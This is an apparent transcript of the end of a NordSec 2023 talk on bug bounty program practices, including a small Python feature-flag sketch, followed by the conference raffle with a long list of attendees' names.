As a person working on the program, also do your own research around this. Understand the vulnerable surface that you have, understand the trends that are out there, understand the attack vectors. It's going to speed things up for everyone: if reports come in and we know what to look for as soon as those land, that can be incredibly helpful. And the last point on here, and I can't stress this enough, is: be professional. Similar to being on the submitting side and not wanting to baffle people with bullshit, that goes two ways. You are, and I say this being on stage talking about it, the face of your company, just like working in support or sales or at the desk at a store. If you say or do something, that represents the company almost more than it represents you. So if I come up here and say something that's wildly off-color, it's not necessarily "Logan said this," it's "GitHub said this." Keep that in mind. And last up, this is for folks who are actually running programs, because I know there are a couple here: thank you for what you do; you make this possible for all of us. The biggest thing here is to utilize your program as a way to refine your program and to work with your broader security teams. Take a look at where your reports are coming from and what types of reports you're getting, and use those to refine your operations, your secure SDLC, all of that. And certainly, and this goes for everyone, try to be as honest and fair as you can. If there are scenarios where your program has had a screw-up, or maybe you've closed a report only to find out six months later that it was actually valid, do the right thing: look for opportunities to reopen those, communicate with the original researcher, and make things right as much as you can. It doesn't take long to go onto bug bounty forums and find some horror stories about programs that have absolutely botched this. I
don't know that our track record is absolutely perfect, and I don't think anybody's is, but the more you can strive in this direction, the better. Similarly, look for opportunities to collaborate internally. The more you can reduce the friction for engineering teams wanting to be in scope for your program, the easier it's going to be to run, because you'll also have a very clear definition of your scope. It won't be a case where you have to constantly go back and forth to understand if something's in scope, if your default is that it is in scope and you have ways to then reach out to those teams. Another part of this is to look at opportunities to bring things in. Looking back at invite-only programs and VIP events: if there are ways you can build that into a beta before something rolls out, if it's right before release and you can feature-flag folks into it so they can start hacking on it before it's out there in the wild affecting customers, then one, that's a great perk for VIPs, because they know they have limited competition, and two, it also lets you ship a more secure product when you get to that point. We already talked about this: understand trends, technical and non-technical. If there's stuff going on out there, whether it be Log4j or the next one, and you can help prepare your company and your teams for responses to it, making sure you've got things in place to be able to follow up quickly, it's super helpful. And on the non-technical side as well, understand if there are big spam issues or something coming in for your platform or your program; again, if there are ways to streamline that, it just reduces stress for everyone.
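The feature-flag idea above, letting VIP researchers hack on a feature before general release, can be sketched very simply. All names here (`FEATURE_FLAGS`, the feature and researcher handles) are hypothetical, purely to illustrate the gating pattern rather than any real flagging system:

```python
# Hypothetical early-access allowlist for a pre-release feature.
VIP_RESEARCHERS = {"researcher_a", "researcher_b"}

FEATURE_FLAGS: dict[str, set[str]] = {
    # feature name -> users who may see it before general availability
    "new-import-api": set(VIP_RESEARCHERS),
}

def is_enabled(feature: str, user: str, generally_available: bool = False) -> bool:
    """A feature is visible if it has shipped, or the user is flagged in."""
    return generally_available or user in FEATURE_FLAGS.get(feature, set())
```

The payoff described in the talk falls out of this shape: flagged researchers exercise the feature early (with limited competition for bounties), while everyone else only sees it once `generally_available` flips, ideally after those early findings are fixed.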
And lastly, look for opportunities to grow your program and attract researchers. If you are brand new to this space and building a new program, start out small and build up from there, but again, be very clear on your scope so there's not a lot of confusion for folks. And certainly, once you have folks coming in, try to treat them as well as you can so they keep coming back and keep finding cool stuff for you. If there are opportunities to do live hacking events or promotions, whatever, through bonuses for new features and things like that, it's certainly encouraged. The feedback we've gotten from folks working on our program, and from other people we've spoken to with other programs, is that the more you can target things, hype things up, and deliver on them, the better off everyone's going to be. So with that, hopefully everyone got pictures of the picture slides; that wraps things up. If you have any questions around any bounty stuff, come find me; otherwise I'll probably be at the bar at the end of it. You can find me on any of the wonderful antisocial things here, but otherwise, thank you, and good luck with the raffle. So we're going to take a five-minute break just to set it up, then we're going to go ahead with the raffle, and this is it for NordSec 2023. Well, the conference, anyway; the CTF starts.
Okay, hello. Okay, so we're going to raffle some stuff. Yeah, very exciting. So the way this is going to work is we're going to read out names, so if you are here, you're probably on the list, and if your name is called out, just come up here. It is first come, first served: you get to pick what you want to take. In addition to the nice gifts, there are also these stacks of books in the back; if anyone wants to learn Visual C# 2008, please take it. Any of the stuff in the pile in the back, just take it if you feel like taking it; otherwise eventually it's going to go in the recycling, so it's just here. Okay, do you want to announce the first few winners? Sure, yeah. So we have a bunch of stuff: we have a Flipper Zero, we have some Leathermans, we have No Starch books, those are new, we have some YubiKeys, and we have a bunch of stuff. So to start out we have Marc Olivier la voix one time two time Craig Duncan all right it's going to be fast Guillaume F lots of opportunities there pick your poison no pressure we also have Norbert Raskovi Hervé Bariel Flo did we already do Will Summerhill Will Summerhill okay Simran Aurora Benjamin Chambon Mathieu Boswell Leanne Dutille okay I saw her going once going twice Tufik Waganuni I am very sorry if I butchered that Jawad Nasser Brian Wright François de Varene is there a question if you're not there we all know Leanne but sorry Leanne Pierre Francois Rémi Langevin V.K. Tran Todd Stavely Louis Lavoix-Coron James Lee so is this the list from the CTF Simon Charrette Gary Pascal or Gary Robert Whitney Benoit Renault Galina Shellest Gabrielle Ruyard Felix Charrette Connor Laidlaw so Simon we're going to need new names Asha Kourgourou Asha Kourgourou Shivashankar William Adam Grenier Michael Nadeau Max Délage Marie-Eve Bergeron Touranjo Yannick Vielle Mathieu Chouinard Maxime Leblanc Rawan Morshed Felix Contant Can you do the next one?
Next one I'm not going to be so lucky on Ashia Hanim Ayasur Guillaume Lacasse Emmanuel Roy Dubreuil Clinton Leg Etienne Ducharm Not scripted Where are we? Yifan John Guylain Carrier Nicolas Lemieux Did you say Nicolas Lemieux? Bradley Callender Marc-Antré Boulet Xavier Pépin Tristan Dostaller Gael Sylvain Francis Venne Tharesh Sharma Martin Proa Eti Shirley-Anne Pagé I saw it too early but... Again Guillaume F Francis Gravel St-Pierre Brandon Borodash Khaled Bra Jessica Williams Michael Laet All of you can take the prize Alexandre Provost Alexandre Laforêt Godot Jonathan Roy It's good that we don't have names that are memes Vincent Theriot Iba Moumenet Tristan Binstman Alexandre Cotessir Kevin Lagasse Deborah Roulot Genmey Fan Alexandre Ogorodnikov Eric Christensen Felix Boulien Felix, Felix, Felix! Oh no, I lost Philippe Guirégoire Richard Vannet Alain Zakour Gary Pascoe Maté Engel Or Maté Angel Samuel Aubert Woo! Michael The Wolf Damien Artoin Dario Martin Silva Guy Comtois Denis Douzgun probably butchered it Stéphane L'Esperance Orion Mock Patrick Bertiom Réda Baidoun Ok Nicolas Loic Fortin Simon Charret Jim Kearney Anais Yapobi Kevyn Mock This is it Olivier Toupin Guy Comtois Kim Schwanier Sarah Morshed Nathan Grant Clayton Smith Mitch Taylor Iba Moumenet Iba Moumenet Iba Moumenet Iba Moumenet Iba Moumenet Nathan Grant Clayton Smith Mitch Taylor Mart Sara Nankambu Chungku Lieberman Berg Alain Yamin Philippe Paré Parvin Ramizani Sébastien Bordage Are you still awake? Now I don't know where... Michael Hopper Balouan Ngouyen Norbert Labé Yinguo Alexander Amstoy Mathieu Chouinard Shane Schuster Someone Julie Petnaud Vincent Drolet Lost Too much traffic Eunice Boulphred I don't know if I pronounced that accurately Nicolas Lemieux Michael Nadeau Ahmed Abdel Wahab Jasmin Paré Philippe Crégoire Liam Rafaille Jonathan Brunette Etienne Gervais Nicolas Tremblay Stéphane Pelletier-Lamotte Neil Yousouk Charles Terrien Jack McCracken Oh okay! 
Orion Mock again Tristan Beansman again Sarah Hughes Henri Lebeau Dani Lafrenière Marc Alexandre Montpa Thomas Heller Anlisa de Forêt Artemis Livingstone Patrick David Patrick Davidson Tremblay Eric Tahan Alexandra Stilaire. And next... Do you want a prize, Flo? I'm okay, I'm okay. You want to learn SQLite? Oracle. We can loop around. Did we just get another one? We're out of names, do we want a... Okay. Alright, so we're going to try something else: we're going to try to throw some things. Not the books; the books are for later, so you can come up, not make a mess, please, and take a book. No fighting allowed, please. So are you guys ready for receiving things? So please. That's fun. So I don't know how good I am at throwing. Oh, sorry. Yeah. Okay, so that's not good. That's not going to happen. This is not amazing for public safety. Yeah. Okay, we're going to trivia at this point. What does CISSP stand for? We have an answer. We have a polite person who raised their hand. Good. I didn't hear, so... honor system. There's another: systems and security. I don't even know the answer. That's good, alright, come claim another prize. Yeah. Do we have another acronym? There are many acronyms in security. Yeah, I think... Okay, we're calling it a day. This has been fun, or not. There are some books to come and get, so please. So the laptop